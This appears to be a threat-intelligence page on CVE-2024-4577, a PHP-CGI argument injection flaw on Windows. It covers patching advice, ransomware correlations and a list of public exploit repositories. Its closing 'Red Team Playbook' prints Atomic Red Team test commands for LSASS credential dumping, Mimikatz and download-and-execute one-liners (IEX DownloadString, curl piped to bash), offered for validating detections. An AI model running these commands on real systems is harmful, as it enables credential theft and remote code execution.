CVE-2024-4577
Overview
This vulnerability is a command-line argument injection flaw affecting the PHP CGI module on Windows platforms when used with Apache. The root cause lies in Windows' 'Best-Fit' character replacement behavior for certain code pages, which causes characters in command-line arguments passed to Win32 API functions to be misinterpreted. This misinterpretation leads the PHP CGI binary to erroneously parse these characters as PHP options, exposing a flaw in how PHP processes input arguments under specific locale settings.
Vulnerability Description
In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.
Impact
An unauthenticated attacker can exploit this vulnerability remotely to inject command-line options into the PHP-CGI process, enabling disclosure of PHP source code and execution of arbitrary PHP code on the server. This leads to full system compromise including data exposure and unauthorized code execution. No user interaction or credentials are required, making it highly exploitable in default Apache and PHP-CGI Windows deployments using affected PHP versions.
Solution
Upgrade PHP to versions 8.1.29 or later, 8.2.20 or later, or 8.3.8 or later as specified in the PHP Group security advisory (https://github.com/php/php-src/security/advisories/GHSA-3qgc-jrrr-25jv). Follow the vendor's official patch instructions to ensure the PHP-CGI module is updated. No effective workaround is recommended other than applying the official patches promptly.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Correlated Groups
Correlations are established through analysis of shared tools, tactics, and infrastructure between threat groups and vulnerabilities. They do not represent direct confirmation of exploitation.
| Group | Confidence | Victims | Source |
|---|---|---|---|
|
akira
|
LOW | 1529 | Chain Inference |
|
ransomhub
|
LOW | 842 | Chain Inference |
|
sinobi
|
LOW | 274 | Chain Inference |
|
frag
|
LOW | 30 | Chain Inference |
|
0apt
|
LOW | — | Chain Inference |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in question arises from the interaction between the PHP CGI module and the Windows operating system, particularly when certain code pages are configured. In specific versions of PHP, when executed under Apache using the PHP-CGI interface, the system's "Best-Fit" behavior can lead to misinterpretation of command-line arguments. This occurs when characters that are not directly representable in the current code page are replaced with similar-looking characters. Consequently, this misinterpretation allows an attacker to manipulate command-line options passed to the PHP binary, potentially leading to unauthorized access to sensitive information, execution of arbitrary PHP code, or exposure of source code.
Attack vectors for this vulnerability are varied and can be exploited through several means. An attacker could craft a malicious request to a web application that relies on the PHP CGI interface, embedding specially formatted characters that the server misinterprets. This could occur through web forms, URL parameters, or even API calls. Once the attacker successfully injects these characters, they can manipulate the PHP execution environment, leading to unauthorized actions such as revealing sensitive files or executing arbitrary PHP scripts. The ease of exploitation, combined with the widespread use of PHP in web applications, makes this vulnerability particularly concerning.
The real-world impact of this vulnerability is significant, especially for businesses that rely on PHP-based applications. If exploited, an attacker could gain access to sensitive data, including user credentials, proprietary business logic, or other confidential information stored in PHP scripts. The potential for executing arbitrary code raises the stakes even higher, as it could lead to full server compromise, data breaches, and subsequent regulatory penalties. The business risks associated with such incidents include reputational damage, loss of customer trust, and financial losses stemming from remediation efforts and potential legal liabilities.
To detect and mitigate this vulnerability, organizations should first ensure that they are running the latest versions of PHP that have addressed this issue. Regular patch management practices are essential to minimize exposure to known vulnerabilities. Additionally, implementing strict input validation and sanitization can help prevent the injection of malicious characters into command-line arguments. Monitoring server logs for unusual activity or error messages related to PHP execution can also aid in early detection of attempted exploits. Organizations should consider employing web application firewalls (WAF) that can help filter out malicious requests before they reach the application layer.
In conclusion, the vulnerability stemming from the PHP CGI module's interaction with Windows code pages presents a critical risk to web applications using PHP. The potential for exploitation is high, given the commonality of PHP in web development. Organizations must prioritize timely updates, rigorous input validation, and proactive monitoring to safeguard against the risks associated with this vulnerability. By adopting a comprehensive security posture, businesses can better protect their assets and maintain the integrity of their web applications in an increasingly hostile cyber landscape.
CSURFACE threat intelligence has detected a marked escalation in activity exploiting CVE-2024-4577, with telemetry indicating a notable surge in attempts targeting PHP environments on Windows platforms. This increase coincides with the continued availability of multiple proof-of-concept exploits circulating publicly, which lowers the barrier for threat actors to weaponize this vulnerability. The involvement of ransomware groups such as akira, ransomhub, and sinobi underscores the growing operationalization of this flaw in financially motivated campaigns. While the EPSS score remains near maximum, the stable short-term trend suggests persistent exploitation rather than a sudden spike. For defenders, this heightened activity signals an increased likelihood of successful intrusions leveraging the PHP CGI module’s code page handling flaw, emphasizing the urgency of vigilance in monitoring and detection. The evolving threat landscape elevates the risk posture associated with CVE-2024-4577, reinforcing its critical status and the necessity for continued attention in security operations.
Update 2 — July 10, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2024-4577, with our telemetry indicating a significant uptick in attacker activity leveraging this PHP CGI vulnerability. This surge coincides with the emergence of multiple new proof-of-concept exploits on public repositories, broadening the accessibility of attack methods for less sophisticated threat actors. Notably, ransomware groups such as akira and sinobi continue to incorporate this vulnerability into their campaigns, underscoring its utility in facilitating initial access and lateral movement within compromised environments. The sustained high EPSS score combined with increased exploitation signals an elevated operational tempo among adversaries, heightening the risk of successful intrusions. For defenders, this development intensifies the urgency to monitor for indicators of exploitation and reinforces the criticality of timely patching. The threat level associated with CVE-2024-4577 has consequently risen, reflecting both the expanding exploitation landscape and the growing adoption by financially motivated threat actors.
Affected Products (5)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Php | Php | All |
cpe:2.3:a:php:php:*:*:*:*:*:*:*:*
|
|
|
Php | Php | All |
cpe:2.3:a:php:php:*:*:*:*:*:*:*:*
|
|
|
Php | Php | All |
cpe:2.3:a:php:php:*:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 39 |
cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 40 |
cpe:2.3:o:fedoraproject:fedora:40:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
PHP CGI Argument Injection Remote Code Execution
exploits/windows/http/php_cgi_arg_injection_rce_cve_2024_4577
|
Orange Tsai, watchTowr, sfewer-r7 | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| PHP CGI Module 8.3.4 - Remote Code Execution (RCE) | İbrahimsql | webapps | php | - | View |
GitHub PoCs (70)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
watchtowrlabs/CVE-2024-4577
PHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC
|
watchtowrlabs | 316 | 65 | 2024-06-07 | View |
|
xcanwin/CVE-2024-4577-PHP-RCE
[漏洞复现] 全球首款利用PHP默认环境(XAMPP)的CVE-2024-4577 PHP-CGI RCE 漏洞 EXP。
|
xcanwin | 163 | 34 | 2024-06-08 | View |
|
TAM-K592/CVE-2024-4577
CVE-2024-4577 is a critical vulnerability in PHP affecting CGI configurations, allowing attackers to execute arbitrary c...
|
TAM-K592 | 77 | 17 | 2024-06-07 | View |
|
11whoami99/CVE-2024-4577
POC & $BASH script for CVE-2024-4577
|
11whoami99 | 43 | 9 | 2024-06-07 | View |
|
Night-have-dreams/php-cgi-Injector
一個測試CVE-2024-4577和CVE-2024-8926的安全滲透工具
|
Night-have-dreams | 45 | 2 | 2025-03-15 | View |
|
Chocapikk/CVE-2024-4577
PHP CGI Argument Injection vulnerability
|
Chocapikk | 35 | 11 | 2024-06-09 | View |
|
ZephrFish/CVE-2024-4577-PHP-RCE
PHP RCE PoC for CVE-2024-4577 written in bash, go, python and a nuclei template
|
ZephrFish | 32 | 13 | 2024-06-08 | View |
|
gh-ost00/CVE-2024-4577-RCE
PHP CGI Argument Injection (CVE-2024-4577) RCE
|
gh-ost00 | 25 | 5 | 2024-08-20 | View |
|
BTtea/CVE-2024-4577-RCE-PoC
CVE-2024-4577 RCE PoC
|
BTtea | 25 | 4 | 2024-11-06 | View |
|
huseyinstif/CVE-2024-4577-Nuclei-Template
|
huseyinstif | 22 | 2 | 2024-06-07 | View |
|
gotr00t0day/CVE-2024-4577
Argument injection vulnerability in PHP
|
gotr00t0day | 13 | 2 | 2024-06-15 | View |
|
K3ysTr0K3R/CVE-2024-4577-EXPLOIT
A PoC exploit for CVE-2024-4577 - PHP CGI Argument Injection Remote Code Execution (RCE)
|
K3ysTr0K3R | 10 | 2 | 2024-06-09 | View |
|
manuelinfosec/CVE-2024-4577
Proof Of Concept RCE exploit for critical vulnerability in PHP <8.2.15 (Windows), allowing attackers to execute arbitrar...
|
manuelinfosec | 9 | 0 | 2024-06-08 | View |
|
l0n3m4n/CVE-2024-4577-RCE
PoC - PHP CGI Argument Injection CVE-2024-4577 (Scanner and Exploit)
|
l0n3m4n | 7 | 1 | 2024-07-06 | View |
|
CirqueiraDev/MassExploit-CVE-2024-4577
CVE-2024-4577 Mass Scanner & Exploit Tool
|
CirqueiraDev | 5 | 2 | 2025-07-23 | View |
|
longhoangth18/CVE-2024-4577
|
longhoangth18 | 5 | 1 | 2024-10-14 | View |
|
0x20c/CVE-2024-4577-nuclei
CVE-2024-4577 nuclei-templates
|
0x20c | 5 | 0 | 2024-06-08 | View |
|
aavamin/cve-2024-4577
CVE-2024-4577
|
aavamin | 5 | 0 | 2024-06-12 | View |
|
bibo318/CVE-2024-4577-RCE-ATTACK
ATTACK PoC - PHP CVE-2024-4577
|
bibo318 | 5 | 0 | 2024-07-11 | View |
|
Junp0/CVE-2024-4577
PHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC
|
Junp0 | 1 | 4 | 2024-06-07 | View |
|
Sh0ckFR/CVE-2024-4577
Fixed and minimalist PoC of the CVE-2024-4577
|
Sh0ckFR | 4 | 0 | 2024-06-13 | View |
|
JeninSutradhar/CVE-2024-4577-checker
A Bash script designed to scan multiple domains for the CVE-2024-4577 vulnerability in PHP-CGI.
|
JeninSutradhar | 3 | 1 | 2024-10-04 | View |
|
zomasec/CVE-2024-4577
CVE-2024-4577 Exploit POC
|
zomasec | 3 | 0 | 2024-06-08 | View |
|
phirojshah/CVE-2024-4577
|
phirojshah | 2 | 1 | 2024-09-12 | View |
|
VictorShem/CVE-2024-4577
CVE-2024-4577 POC
|
VictorShem | 2 | 1 | 2024-06-17 | View |
|
ywChen-NTUST/PHP-CGI-RCE-Scanner
Scanning CVE-2024-4577 vulnerability with a url list.
|
ywChen-NTUST | 1 | 2 | 2024-09-10 | View |
|
ibrahmsql/CVE-2024-4577
CVE-2024-4577.py
|
ibrahmsql | 3 | 0 | 2025-06-15 | View |
|
d3ck4/Shodan-CVE-2024-4577
POC for CVE-2024-4577 with Shodan integration
|
d3ck4 | 2 | 0 | 2024-06-12 | View |
|
AlperenY-cs/CVE-2024-4577
Create lab for CVE-2024-4577
|
AlperenY-cs | 2 | 0 | 2024-06-28 | View |
|
byteReaper77/CVE-2024-4577
Exploit (C) CVE-2024-4577 on PHP CGI
|
byteReaper77 | 2 | 0 | 2025-06-23 | View |
|
Sysc4ll3r/CVE-2024-4577
Nuclei Template for CVE-2024-4577
|
Sysc4ll3r | 1 | 1 | 2024-06-07 | View |
|
WanLiChangChengWanLiChang/CVE-2024-4577-RCE-EXP
|
WanLiChangChengWanLiChang | 0 | 2 | 2024-06-07 | View |
|
jakabakos/CVE-2024-4577-PHP-CGI-argument-injection-RCE
|
jakabakos | 0 | 2 | 2024-06-18 | View |
|
gl1tch0x1/PHP_8.1.x_Exploit
Automated detection & exploitation of critical PHP vulnerabilities (CVE-2024-4577 bypass, CVE-2025-14177, CVE-2025-14180...
|
gl1tch0x1 | 1 | 0 | 2026-04-29 | View |
|
Wh02m1/CVE-2024-4577
|
Wh02m1 | 1 | 0 | 2024-06-07 | View |
|
0XFFFF-XD/CVE-2024-4577-PHP-CGI-RCE
|
0XFFFF-XD | 1 | 0 | 2024-06-12 | View |
|
PhinehasNarh/CVE-2024-4577-LetsDefend-walkthrough
This is an Incident Response Walkthrough: Mitigating a Zero-Day Attack (CVE-2024-4577)
|
PhinehasNarh | 1 | 0 | 2024-06-24 | View |
|
ggfzx/CVE-2024-4577
|
ggfzx | 1 | 0 | 2024-06-26 | View |
|
sug4r-wr41th/CVE-2024-4577
PHP CGI CVE-2024-4577 PoC
|
sug4r-wr41th | 1 | 0 | 2025-04-12 | View |
|
taida957789/CVE-2024-4577
|
taida957789 | 1 | 0 | 2024-06-07 | View |
|
mananjain61/PHP-CGI-INTERNAL-RCE
Delivering PHP RCE (CVE-2024-4577) to the Local Network Servers
|
mananjain61 | 0 | 1 | 2025-07-11 | View |
|
Ra1n-60W/CVE-2024-4577
CVE-2024-4577
|
Ra1n-60W | 0 | 0 | 2024-06-07 | View |
|
dbyMelina/CVE-2024-4577
python poc编写练手,可以对单个目标或批量检测
|
dbyMelina | 0 | 0 | 2024-06-09 | View |
|
bl4cksku11/CVE-2024-4577
This is a PoC for PHP CVE-2024-4577.
|
bl4cksku11 | 0 | 0 | 2024-06-11 | View |
|
Entropt/CVE-2024-4577_Analysis
Vietnam National Cyber Security (NCS)'s Internship - 2nd Test
|
Entropt | 0 | 0 | 2024-06-12 | View |
|
olebris/CVE-2024-4577
CVE-2024-4577
|
olebris | 0 | 0 | 2024-06-28 | View |
|
charis3306/CVE-2024-4577
CVE-2024-4577 EXP
|
charis3306 | 0 | 0 | 2024-07-03 | View |
|
gmh5225/CVE-2024-4577-PHP-RCE
Automated PHP remote code execution scanner for CVE-2024-4577
|
gmh5225 | 0 | 0 | 2024-07-16 | View |
|
AhmedMansour93/Event-ID-268-Rule-Name-SOC292-Possible-PHP-Injection-Detected-CVE-2024-4577-
🚨 New Incident Report Completed! 🚨 Just wrapped up "Event ID 268: SOC292 - Possible PHP Injection Detected (CVE-2024-457...
|
AhmedMansour93 | 0 | 0 | 2024-09-12 | View |
|
tpdlshdmlrkfmcla/php-cgi-cve-2024-4577
php-cgi-cve-2024-4577
|
tpdlshdmlrkfmcla | 0 | 0 | 2025-02-14 | View |
|
Didarul342/CVE-2024-4577
|
Didarul342 | 0 | 0 | 2025-02-14 | View |
|
Gill-Singh-A/CVE-2024-4577-Exploit
PHP CGI Parameter Injection Vulnerability (RCE: Remote Code Execution)
|
Gill-Singh-A | 0 | 0 | 2025-04-18 | View |
|
tntrock/CVE-2024-4577_PowerShell
使用PowsrShell掃描CVE-2024-4577
|
tntrock | 0 | 0 | 2025-05-12 | View |
|
r0otk3r/CVE-2024-4577
|
r0otk3r | 0 | 0 | 2025-07-07 | View |
|
Skycritch/CVE-2024-4577
Exploit for php-cgi
|
Skycritch | 0 | 0 | 2025-07-16 | View |
|
InfoSec-DB/PHPCGIScanner
A PHP CGI Vulnerability Scanner for CVE-2024-4577
|
InfoSec-DB | 0 | 0 | 2025-08-23 | View |
|
princew88/CVE-2024-4577
|
princew88 | 0 | 0 | 2024-06-07 | View |
|
graphite-org/CVE-2024-4577
|
graphite-org | 0 | 0 | 2024-06-07 | View |
|
a-roshbaik/CVE-2024-4577-PHP-RCE
|
a-roshbaik | 0 | 0 | 2024-07-24 | View |
|
zjhzjhhh/CVE-2024-4577
CVE-2024-4577
|
zjhzjhhh | 0 | 0 | 2024-06-07 | View |
|
Jcccccx/CVE-2024-4577
批量验证POC和EXP
|
Jcccccx | 0 | 0 | 2024-07-31 | View |
|
bughuntar/CVE-2024-4577
CVE-2024-4577 Exploits
|
bughuntar | 0 | 0 | 2024-08-17 | View |
|
ahmetramazank/CVE-2024-4577
|
ahmetramazank | 0 | 0 | 2024-11-03 | View |
|
Dejavu666/CVE-2024-4577
CVE-2024-4577 POC
|
Dejavu666 | 0 | 0 | 2025-01-08 | View |
|
a-roshbaik/CVE-2024-4577
|
a-roshbaik | 0 | 0 | 2024-07-24 | View |
|
wilss0n/CVE-2024-4577
|
wilss0n | 0 | 0 | 2025-03-21 | View |
|
KimJuhyeong95/cve-2024-4577
|
KimJuhyeong95 | 0 | 0 | 2025-05-27 | View |
|
a1ex-var1amov/ctf-cve-2024-4577
|
a1ex-var1amov | 0 | 0 | 2025-08-25 | View |
|
rayngnpc/CVE-2024-4577-rayng
CVE-2024-4577 PHP CGI Argument Injection - Detection Lab with Vagrant VMs and Wazuh SIEM rules
|
rayngnpc | 0 | 0 | 2025-12-30 | View |
|
Ianthinus/CVE-2024-4577
|
Ianthinus | 0 | 0 | 2025-08-20 | View |
Ransomware Groups 5
Threat Feed
37 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability (30 known victims)
Ransomware group known to exploit this vulnerability (30 known victims)
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability (274 known victims)
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability (274 known victims)
Ransomware group known to exploit this vulnerability
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Deployed role: Linux · Web Server
Kill chain derived from the ML classifier. Pick the target OS above to see the OS-specific path and matching playbook.
Attack Vectors ML
MITRE ATT&CK Techniques (10)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
52%
|
High | High | |
| CAPEC-6 | Argument Injection |
48%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
45%
|
Medium | High |
Red Team Playbook
108 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
